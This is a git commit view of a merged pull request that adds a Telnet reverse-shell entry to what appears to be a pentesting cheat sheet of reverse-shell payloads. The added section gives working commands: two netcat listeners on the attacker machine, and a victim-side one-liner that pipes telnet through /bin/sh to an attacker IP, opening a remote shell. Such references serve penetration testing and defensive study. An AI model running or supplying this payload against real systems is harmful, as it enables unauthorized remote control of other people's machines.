Merge pull request #386 from bhattsameer/patch-2

Added Reverse Shell using Telnet
patch-1
Swissky 2021-07-01 19:14:23 +02:00 committed by GitHub
commit 2148c89452
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 11 additions and 0 deletions

View File

@ -28,6 +28,7 @@
* [Python](#python) * [Python](#python)
* [Ruby](#ruby) * [Ruby](#ruby)
* [Socat](#socat) * [Socat](#socat)
* [Telnet](#telnet)
* [War](#war) * [War](#war)
* [Meterpreter Shell](#meterpreter-shell) * [Meterpreter Shell](#meterpreter-shell)
* [Windows Staged reverse TCP](#windows-staged-reverse-tcp) * [Windows Staged reverse TCP](#windows-staged-reverse-tcp)
@ -248,6 +249,16 @@ Thread thread = new Thread(){
thread.start(); thread.start();
``` ```
### Telnet
```bash
In Attacker machine start two listeners:
nc -lvp 8080
nc -lvp 8081
In Victime machine run below command:
telnet <Your_IP> 8080 | /bin/sh | telnet <Your_IP> 8081
```
### War ### War
```java ```java